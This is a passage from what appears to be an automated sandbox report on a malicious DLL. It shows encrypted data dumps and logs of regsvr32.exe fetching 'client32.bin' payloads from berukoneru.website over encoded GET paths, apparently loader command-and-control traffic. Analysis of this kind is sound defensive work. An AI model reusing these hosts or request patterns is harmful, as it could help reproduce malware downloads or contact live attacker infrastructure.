2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                        Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                        2021-12-14 09:34:08 UTC1214INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                        Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                        2021-12-14 09:34:08 UTC1230INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                        Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                        2021-12-14 09:34:08 UTC1310INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                        Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                        2021-12-14 09:34:08 UTC1326INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                        Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                        2021-12-14 09:34:08 UTC1374INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                        Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                        2021-12-14 09:34:08 UTC1390INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                        Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                        2021-12-14 09:34:08 UTC1406INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                        Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                        2021-12-14 09:34:08 UTC1422INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                        Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        6 | 192.168.2.5 | 49801 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2021-12-14 09:34:07 UTC | 1101 | OUT | GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC | 1134 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 268426
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=brv6hst5is03pld8n10nk7l6i7; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        7 | 192.168.2.5 | 49803 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2021-12-14 09:34:07 UTC | 1101 | OUT | GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC | 1166 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:08 GMT
                        Content-Type: application/zip
                        Content-Length: 268426
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=g1gq8askkhd329edj5m5lndu22; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1819INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                        Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                        2021-12-14 09:34:08 UTC1835INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                        Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                        2021-12-14 09:34:08 UTC1851INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                        Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                        2021-12-14 09:34:08 UTC1867INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                        Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                        2021-12-14 09:34:08 UTC1883INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                        Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        8 | 192.168.2.5 | 49805 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2021-12-14 09:34:08 UTC | 1890 | OUT | GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC | 1891 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:08 GMT
                        Content-Type: application/zip
                        Content-Length: 1869
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=t7tkicntofbn6h47i9uut29i93; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC | 1891 | IN | Data Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                        Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        9 | 192.168.2.5 | 49806 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2021-12-14 09:34:08 UTC | 1890 | OUT | GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC | 1893 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:08 GMT
                        Content-Type: application/zip
                        Content-Length: 1869
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=epkmjqjhsvjopqqq17rp3d0rs6; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC | 1893 | IN | Data Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                        Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                        Code Manipulations

                        Statistics

                        Behavior


                        System Behavior

                        General

                        Start time:10:33:06
                        Start date:14/12/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\6.dll"
                        Imagebase:0x10c0000
                        File size:116736 bytes
                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
